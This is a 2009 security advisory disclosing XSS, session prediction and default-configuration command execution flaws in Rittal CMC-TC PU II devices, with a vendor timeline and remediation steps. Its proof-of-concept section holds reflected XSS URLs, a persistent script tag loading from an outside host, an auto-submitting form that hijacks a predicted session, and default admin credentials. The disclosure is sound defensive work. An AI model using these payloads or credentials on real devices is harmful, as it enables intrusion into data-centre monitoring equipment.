<<< Date Index >>>     <<< Thread Index >>>

Rittal CMC-TC Processing Unit II multiple vulnerabilities



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

                          Louhi Networks Oy
                       -= Security Advisory =-


      Advisory: Rittal CMC-TC Processing Unit II
                multiple vulnerabilities
  Release Date: 2009-03-23
 Last Modified: 2009-03-22
       Authors: Henri Lindberg, CISA
                [henri d0t lindberg at louhi d0t fi]

   Application: Rittal CMC-TC PU II Web management

       Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,
                possibly other Rittal products

  Attack type : XSS Type I, XSS Type II, Session prediction,
                Remote command execution in default configuration
      Severity: Moderate
 Vendor Status: Vendor notified.
                Patch already available for XSS vulnerabilities.
                Other vulnerabilities will be addressed in a future
                version, no release date set.
    References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt


Overview:
   Quote from http://www.rimatrix5.com/ :
   "The Computer Multi Control Top-Concept (CMC-TC) from Rittal is
    a complete security management for preventive protection to guard
    against consequential costs, and is the central organisational unit
    for linking to the facility management.
    ...
    Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring
    system. The PU II is the coordinator between the sensor unit and the
    network. It is configured via the integral Web server."

Details:

    Several vulnerabilities were identified from CMC-TC PU II web
    interface. These include XSS Type I, XSS Type II, weak session
    management and insecure default configuration.

    XSS Type 1:
    -----------
    Web application fails to validate and/or htmlencode user input when
    handling erroneous requests. This allows attacker to inject HTML and
    client-side scripts to victim's browser by creating suitable links.

    This vulnerability cannot be used for session hijacking, because
    CMC-TC PU II requires each valid request to contain current session
    ID as URL parameter. Requests without session ID are redirected to
    the login page. Therefore only phishing-type attacks or attacks
    against user's browser are possible.

    Successful exploitation requires that attacker can lure or force
    the user to follow the malicious link.

    XSS Type 2:
    -----------
    Web application fails to sanitize and/or htmlencode user input on
    system information page. This allows attacker to backdoor the device
    with HTML and browser interpreted content (such as ECMAscript
    dialects or other client-side scripts) as the content is displayed
    always after login. Persistent XSS allows attacker to modify
    displayed content or to change the victim's password (since old
    password is not required for password changes).

    Succesful exploitation requires access to the web management
    interface either with valid credentials or hijacked session.

    Weak session management:
    ------------------------
    CMC-TC PU II uses unixtime from login moment as session identifier,
    thus having insufficient randomization.

    If administrator login time is known and session is still valid, it
    can be brute-forced with relatively little effort. Proof-of-concept
    tool is provided, but any web application security tool (such as
    Burp Intruder) can be used for this.

    Successful exploitation requires that administrator login time is
    known (or a reasonably accurate guess can be made) and the session
    is still  active.

    Insecure default configuration:
    -------------------------------
    If default administrator password is not changed, attacker can run
    arbitrary commands and modify the system software by uploading
    malicious  update scripts via ftp. See update packet script contents
    for detailed information about the update process (eg update_l.sh).

    Software update packet expects user to have default password
    in place, since ftp-upload script contains hardcoded default
    password. The update will fail with no errors if it's been changed.

    What makes this interesting is the fact that the device does not
    offer operating system level access through any of the other
    management interfaces. Telnet and SSH both offer a menu based
    administration interface.

    Successful exploitation requires default administrator password and
    access to ftp port of the target device.

Remediation:
   * Restrict unauthorized network access to device
   * Change default passwords (instructions provided in Operation
     Manual)
   * Install patched Version 2.60a
   * Update future patch version as soon as available
   * Configure web interface to 'view only'
   * Review device configuration after an administrator has been let go
   * Do not follow untrusted links

Timeline:
   * 2008-xx-xx Issues discovered

   * 2009-02-25 Contacted vendor via e-mail

   * 2009-03-02 Contacted vendor via e-mail

   * 2009-03-02 Vendor response.
                XSS vulnerabilities were already fixed independently.


http://www.rittal.de/downloads/Software/de/CMC_TC/18_update_processing_unit2/PU2_Update_v2.60a.zip

http://www.rittal.de/downloads/Software/en/CMC_TC/12_CMC_TC_Processing_unit/7320100V33e.pdf

     Quote from vendor (sic):

     "thank you very much by the security information XXS.
      We have seen, your customer has check the PUII SW V2.45.
      Actual we have a better Version 2.60a with more seyurity.
      Our XXS-Check of that Version is OK.
      If you has by the basic more information for Rittal,
      we are fine to get . "

   * 2009-03-02 Contacted vendor via e-mail requesting information about
                weak session management and public disclosure of XSS
                vulnerabilities.

   * 2009-03-02 Discovered issues regarding default configuration from
                update packages

   * 2009-03-16 Contacted vendor via e-mail requesting information
                regarding vulnerabilities and stating intent to release
                the advisory

   * 2009-03-19 Vendor response. Promises to patch vulnerabilities in a
                future version.

   * 2009-03-19 Contacted vendor via e-mail requesting release date for
                the update.

   * 2009-03-20 Vendor response. Release date not set.

   * 2009-03-20 Contacted vendor via e-mail stating intent to release
                the advisory. Delivered draft version of advisory.


Proof-of-Concept:

0) XSS Type 1 / Reflected

http://cmc.example.com/cmclogin.cgi?Fredo=%3Cscript%3Ealert('You%20broke%20my%20heart.You%20broke%20my%20heart');%3C/script%3E

http://cmc.example.com/cmcget.cgi?46010%3CSCRIPT%3Ealert('I%20know%20it%20was%20you.');%3C/SCRIPT%3E


1) XSS Type 2 / Persistent
   Setup - General - Location: <script src="http://l7.fi";></script>

1234567890 is the unixtime for administrator's login.

<html>
<head><title>42</title></head>
<body onload="document.backdoor.submit()">
<form ACTION=http://1.1.1.1/cmcget.cgi?630101011234567890 METHOD=POST
name="backdoor">
  <input name="p001" value="Initech Datacenter CMC-TC PU #42">
  <input name="p002" value="Compton, LA county">
  <input name="p003" value="servicedesk@xxxxxxxxxxx">
  <input name="p004" value="0">
  <input name="p005" value="0">
  <input name="p005" value="1">
  <input name="p006" value="0">
  <input name="p006" value="1">
  <input name="p007" value="1">
  <input name="p008" value="04.02.2000">
  <input name="p009" value="04:20:00">
</form>
</body>
</html>

2) Session prediction

Proof-of-concept brute force tool available at
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip


Other information:
* Default username and password is cmc
* Default administrator username/password is admin
* Device supports following protocols TCP/IP, SNMPv1, SNMPv3, FTP,
  SFTP, SMTP, HTTPS, NTP, SSH, PPP, DHCP. Further research is
  highly encouraged.


"Six pints of bitter. And quickly please, the world's about to end."
 -- Ford Prefect

Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
no liabilities, information provided 'as is' for educational purposes.
Reproduction allowed as long as credit is given. Information wants to
be free.
-----BEGIN PGP SIGNATURE-----

iEYEAREIAAYFAknHdIoACgkQ3TZNEGeZkm51ywCgurXjibfo7YnVo4w42652m/9l
BiEAoJcIyGDmjrM0ebS+6ZYL6sniQ+qR
=ic2o
-----END PGP SIGNATURE-----